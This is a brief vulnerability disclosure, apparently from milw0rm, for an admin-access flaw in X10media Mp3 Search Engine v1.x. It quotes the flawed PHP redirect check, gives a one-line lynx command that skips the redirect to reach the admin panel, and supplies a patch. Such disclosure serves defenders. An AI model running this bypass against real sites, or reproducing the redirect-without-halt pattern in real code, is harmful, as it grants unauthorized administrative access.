################# ~THUNDER ################################################################ ~Product: X10media Mp3 Search Engine v1.x Admin Access Vulnerability ~Author : THUNDER ~File : admin/admin.php ##### ~Vulnerable Code ############################################################################ /** * User not an administrator, redirect to main page * automatically. */ if(!$session->isAdmin()){ header("Location: ../main.php"); } else{ /** * Administrator is viewing page, so display all * forms. */ } ---------------------------------------- if the user is not admin redirect it to main.php, so we can exploit it using lynx by disabling redirection. ##### ~Exploit ############################################################################ lynx -noredir http://www.vulnerable.com/admin/admin.php allow the cookies, and you're in admin panel. ##### ~Solution ############################################################################ Open admin/admin.php 1- find: /** * User not an administrator, redirect to main page * automatically. */ if(!$session->isAdmin()){ header("Location: ../main.php"); } else{ /** * Administrator is viewing page, so display all * forms. */ } 2- Replace it with: /** * User not an administrator, show error 404 */ if(!$session->isAdmin()){ die(header("HTTP/1.1 404 Not Found")); } ########################################################################################### # milw0rm.com [2009-04-13]